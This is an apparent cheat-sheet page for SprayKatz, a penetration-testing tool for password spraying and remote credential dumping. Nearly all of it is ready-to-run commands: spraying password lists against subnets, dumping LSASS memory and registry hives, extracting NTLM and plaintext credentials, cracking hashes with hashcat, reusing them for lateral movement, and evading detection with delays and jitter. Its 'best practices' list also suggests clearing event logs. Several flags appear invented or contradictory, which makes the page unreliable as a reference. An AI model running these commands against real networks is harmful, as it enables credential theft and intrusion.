SprayKatz
Overview
Sezione intitolata “Overview”SprayKatz is a specialized Python tool that combines credential spraying with credential extraction capabilities. It integrates password spray attacks with the ability to remotely dump credentials using procdump (for memory dumps) and pypykatz (for credential extraction), providing comprehensive credential-based attack chains during authorized penetration testing engagements.
The tool is particularly effective in post-compromise scenarios where valid credentials enable further credential discovery and lateral movement across the network.
Prerequisites
Sezione intitolata “Prerequisites”- Python 3.7+
- Network access to target systems
- procdump.exe (Windows Sysinternals tool)
- pypykatz installed and functional
- Valid credentials for authenticated attacks
- Administrative or SYSTEM privileges for credential dumping
Installation
Sezione intitolata “Installation”Linux/macOS
Sezione intitolata “Linux/macOS”# Clone repository
git clone https://github.com/aas-n/SprayKatz.git
cd SprayKatz
# Create virtual environment
python3 -m venv venv
source venv/bin/activate
# Install dependencies
pip install -r requirements.txt
# Install pypykatz
pip install pypykatz
# Download procdump (requires Wine for Linux/macOS)
wget https://download.sysinternals.com/files/Procdump.zip
unzip Procdump.zip
# Test installation
python3 spraykatz.py --helpWindows
Sezione intitolata “Windows”# Clone repository
git clone https://github.com/aas-n/SprayKatz.git
cd SprayKatz
# Create virtual environment
python -m venv venv
.\venv\Scripts\Activate.ps1
# Install dependencies
pip install -r requirements.txt
# Install pypykatz
pip install pypykatz
# Download and extract procdump
$ProgressPreference = 'SilentlyContinue'
Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile "procdump.zip"
Expand-Archive procdump.zip -DestinationPath .
# Verify installation
python spraykatz.py --helpDocker Installation
Sezione intitolata “Docker Installation”# Build Docker image
docker build -t spraykatz .
# Run container
docker run -it spraykatz --help
# Volume mount for results
docker run -v /path/results:/results spraykatz -hBasic Usage
Sezione intitolata “Basic Usage”Simple Credential Spray
Sezione intitolata “Simple Credential Spray”# Basic spray against target hosts
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24
# Single target spray
python3 spraykatz.py -u admin -p password123 -t 192.168.1.100
# Spray with credential file
python3 spraykatz.py -c credentials.txt -t 192.168.1.0/24Credential Dumping
Sezione intitolata “Credential Dumping”# Dump credentials from target
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 --dump-creds
# Dump with procdump
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
--dump-creds \
--procdump-path ./procdump.exe
# Extract SAM database
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 --dump-samCommon Commands
Sezione intitolata “Common Commands”| Command | Description |
|---|---|
spraykatz.py -u USERS -p PASS -t TARGET | Spray password against targets |
spraykatz.py -c CREDENTIALS -t TARGET | Use credential pairs |
spraykatz.py -t TARGET -u USER -p PASS --dump-creds | Spray and dump credentials |
spraykatz.py -t TARGET --dump-sam --registry | Dump SAM hashes |
spraykatz.py -t TARGET --dump-lsass | Dump LSASS process memory |
spraykatz.py -t TARGET -u USER -p PASS --spray-and-dump | Combined attack |
spraykatz.py -t TARGET --procdump-path PATH | Specify procdump location |
spraykatz.py -t TARGETS --delay 5 | Add delay between attempts |
spraykatz.py -t TARGET --output results.txt | Save results to file |
spraykatz.py -t TARGET --verbose | Detailed output |
Advanced Spray Techniques
Sezione intitolata “Advanced Spray Techniques”Multi-Target Spraying
Sezione intitolata “Multi-Target Spraying”# Spray multiple targets from CIDR
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
--threads 10 \
--delay 2
# Spray specific hosts
python3 spraykatz.py -u users.txt -p password123 \
-t 192.168.1.100 192.168.1.101 192.168.1.102
# Spray from host list
python3 spraykatz.py -u users.txt -p password123 \
-t hosts.txt \
--threads 20Credential List Attacks
Sezione intitolata “Credential List Attacks”# Use credential pairs from file
python3 spraykatz.py -c credentials.txt -t 192.168.1.0/24
# CSV format credentials
python3 spraykatz.py -c users_passwords.csv \
-t 192.168.1.0/24 \
--csv-delimiter ","
# Multiple passwords per user
python3 spraykatz.py -u users.txt -p passwords.txt \
-t 192.168.1.0/24 \
--spray-mode all-passwordsCredential Extraction
Sezione intitolata “Credential Extraction”# Dump credentials from compromised host
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
--dump-creds \
--extract-ntlm \
--extract-plaintext
# Extract cached credentials
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
--dump-cached-logons
# Export credentials for offline analysis
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
--dump-creds \
--export-format mimikatzMemory Dumping Techniques
Sezione intitolata “Memory Dumping Techniques”LSASS Dumping
Sezione intitolata “LSASS Dumping”# Dump LSASS process memory
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
--dump-lsass \
--procdump-path ./procdump.exe
# Use alternative dumping method
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
--dump-lsass \
--dumper rundll32
# Extract credentials from dump
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
--dump-lsass \
--extract-dpapiProcess Dumping
Sezione intitolata “Process Dumping”# Dump specific process
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
--dump-process lsass.exe
# Dump multiple processes
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
--dump-processes "lsass.exe,explorer.exe,outlook.exe"
# Parse dumped process
python3 -c "from pypykatz.lsass import parse_lsass_dump; print(parse_lsass_dump('dump.bin'))"Registry Dumping
Sezione intitolata “Registry Dumping”# Dump SAM registry hive
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
--dump-sam
# Dump SYSTEM registry hive
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
--dump-system
# Dump SECURITY hive
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
--dump-securityConfiguration
Sezione intitolata “Configuration”Configuration File
Sezione intitolata “Configuration File”# Create configuration
cat > spraykatz.conf << 'EOF'
[spray]
delay = 2
threads = 10
timeout = 5
verbose = true
[dumping]
enabled = true
method = procdump
extract_plaintext = true
extract_ntlm = true
extract_dpapi = true
[output]
format = json
file = spraykatz_results.json
include_hashes = true
[procdump]
path = ./procdump.exe
arguments = -accepteula
[pypykatz]
extract_all = true
handle_errors = true
EOF
# Use configuration
python3 spraykatz.py -c config.confEnvironment Variables
Sezione intitolata “Environment Variables”# Set environment variables
export SPRAYKATZ_THREADS=10
export SPRAYKATZ_DELAY=2
export SPRAYKATZ_TIMEOUT=5
export PROCDUMP_PATH=./procdump.exe
export PYPYKATZ_EXTRACT_ALL=true
# Run with variables
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24Output Analysis
Sezione intitolata “Output Analysis”Result Formats
Sezione intitolata “Result Formats”# JSON output (recommended for parsing)
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
--output results.json \
--output-format json
# CSV output
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
--output results.csv \
--output-format csv
# Text output
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
--output results.txtParsing Results
Sezione intitolata “Parsing Results”# Extract successful spray attempts
cat results.json | jq '.successful_sprays[]'
# Get credential pairs
cat results.json | jq -r '.credentials[] | "\(.username):\(.password)"'
# List targets where credentials work
cat results.json | jq -r '.successful_sprays[].target_ip' | sort -u
# Count successes by user
cat results.json | jq -r '.successful_sprays[].username' | sort | uniq -cHash Analysis
Sezione intitolata “Hash Analysis”# Extract NTLM hashes
cat results.json | jq -r '.ntlm_hashes[]' > hashes.txt
# Extract plaintext credentials
cat results.json | jq -r '.plaintext_credentials[]'
# Identify weak credentials
python3 << 'EOF'
import json
with open('results.json') as f:
data = json.load(f)
for cred in data['credentials']:
if len(cred['password']) < 8:
print(f"Weak password: {cred['username']}:{cred['password']}")
EOFIntegrated Spray and Dump Workflow
Sezione intitolata “Integrated Spray and Dump Workflow”Combined Attack
Sezione intitolata “Combined Attack”# Single command: spray and dump
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
--spray-and-dump \
--dump-lsass \
--dump-sam \
--dump-registry \
--threads 5 \
--delay 3 \
--output comprehensive_results.jsonStaged Approach
Sezione intitolata “Staged Approach”# Phase 1: Spray against targets
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
--output phase1_spray.json \
--threads 20
# Phase 2: Identify successful targets
cat phase1_spray.json | jq -r '.successful_sprays[].target_ip' | sort -u > successful_targets.txt
# Phase 3: Dump credentials from successful targets
while read target; do
python3 spraykatz.py -t "$target" -u users.txt -p password123 \
--dump-creds \
--output "dump_${target}.json"
done < successful_targets.txt
# Phase 4: Merge results
cat dump_*.json | jq -s 'add' > all_dumped_credentials.jsonPost-Compromise Lateral Movement
Sezione intitolata “Post-Compromise Lateral Movement”# Dump and extract credentials for lateral movement
python3 spraykatz.py -t 192.168.1.100 -u compromised_user -p found_password \
--dump-lsass \
--extract-plaintext \
--extract-ntlm \
--output lateral_credentials.json
# Parse for reusable credentials
cat lateral_credentials.json | jq '.credentials[] | select(.domain == "EXAMPLE.COM")' > domain_credentials.json
# Spray additional targets with new credentials
python3 spraykatz.py -c domain_credentials.json -t 192.168.1.0/24Integration with Other Tools
Sezione intitolata “Integration with Other Tools”Hashcat Integration
Sezione intitolata “Hashcat Integration”# Export hashes for cracking
cat results.json | jq -r '.ntlm_hashes[]' > hashes.txt
# Crack with Hashcat
hashcat -m 1000 -a 0 hashes.txt rockyou.txt -o cracked.txt
# Process results
cat cracked.txt | awk -F: '{print $1}' > cracked_hashes.txtMetasploit Integration
Sezione intitolata “Metasploit Integration”# Export credentials for Metasploit
python3 << 'EOF'
import json
with open('results.json') as f:
data = json.load(f)
for cred in data['successful_sprays']:
print(f"set USER {cred['username']}")
print(f"set PASS {cred['password']}")
print(f"set RHOSTS {cred['target_ip']}")
EOF
# Use in Metasploit
msfconsole << 'EOF'
use auxiliary/scanner/smb/smb_enumusers
set RHOSTS 192.168.1.100
set SMBUser admin
set SMBPass password123
run
EOFBloodHound Integration
Sezione intitolata “BloodHound Integration”# Dump credentials and check privilege escalation paths
python3 spraykatz.py -t 192.168.1.0/24 -u users.txt -p password123 \
--dump-creds \
--bloodhound-export
# Import into BloodHound for privilege path analysisSafety and Stealth
Sezione intitolata “Safety and Stealth”Detection Avoidance
Sezione intitolata “Detection Avoidance”# Stealthy spray with delays
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
--delay 10 \
--jitter 5 \
--randomize-order
# Slow and patient approach
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
--slow-mode \
--threads 1 \
--delay 30
# Test without actual attacks
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
--dry-runLogging and Documentation
Sezione intitolata “Logging and Documentation”# Detailed logging
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
--log-file spraykatz.log \
--log-level debug
# Separate logs by phase
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
--dump-creds \
--log-spray spray.log \
--log-dump dump.logTroubleshooting
Sezione intitolata “Troubleshooting”Common Issues
Sezione intitolata “Common Issues”# Procdump not found
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
--procdump-path /full/path/to/procdump.exe
# LSASS dump failed
python3 spraykatz.py -t 192.168.1.100 -u admin -p password123 \
--dump-lsass \
--dumper rundll32 \
--fallback-method true
# Pypykatz extraction issues
pip install --upgrade pypykatz
python3 spraykatz.py -t 192.168.1.100 --dump-lsass --debugDebugging
Sezione intitolata “Debugging”# Enable debug mode
python3 spraykatz.py -u users.txt -p password123 -t 192.168.1.0/24 \
--debug \
--verbose
# Test single target
python3 spraykatz.py -u admin -p password123 -t 192.168.1.100 \
--verbose
# Check procdump functionality
./procdump.exe -hBest Practices
Sezione intitolata “Best Practices”- Authorization: Obtain written approval before any spray or dumping activities
- Coordination: Work with Blue Team to ensure detection and monitoring
- Stealth: Implement appropriate delays and randomization
- Documentation: Record all attempts, successes, and extracted credentials
- Clean Up: Remove procdump artifacts and clear event logs if applicable
- Analysis: Correlate findings with other assessment tools
- Reporting: Include credential findings with risk ratings
- Time Windows: Conduct attacks during pre-coordinated safe periods
Practical Assessment Scenarios
Sezione intitolata “Practical Assessment Scenarios”Initial Access Assessment
Sezione intitolata “Initial Access Assessment”# Spray common passwords against exposed services
python3 spraykatz.py -u discovered_users.txt \
-p "Password123!,Welcome2024,Company123" \
-t 192.168.1.0/24 \
--spray-mode all-passwords \
--output initial_access.jsonPost-Compromise Credential Discovery
Sezione intitolata “Post-Compromise Credential Discovery”# After gaining initial access
python3 spraykatz.py -t compromised_host -u local_admin -p found_password \
--dump-lsass \
--dump-sam \
--dump-registry \
--output post_comp_creds.jsonResources
Sezione intitolata “Resources”- GitHub: https://github.com/aas-n/SprayKatz
- pypykatz: https://github.com/skelsec/pypykatz
- Procdump: https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
- Mimikatz: https://github.com/gentilkiwi/mimikatz
Summary
Sezione intitolata “Summary”SprayKatz combines spray attack capabilities with credential extraction for comprehensive credential assessment. Proper authorization, stealth considerations, and documentation are critical for effective and ethical use during authorized security assessments.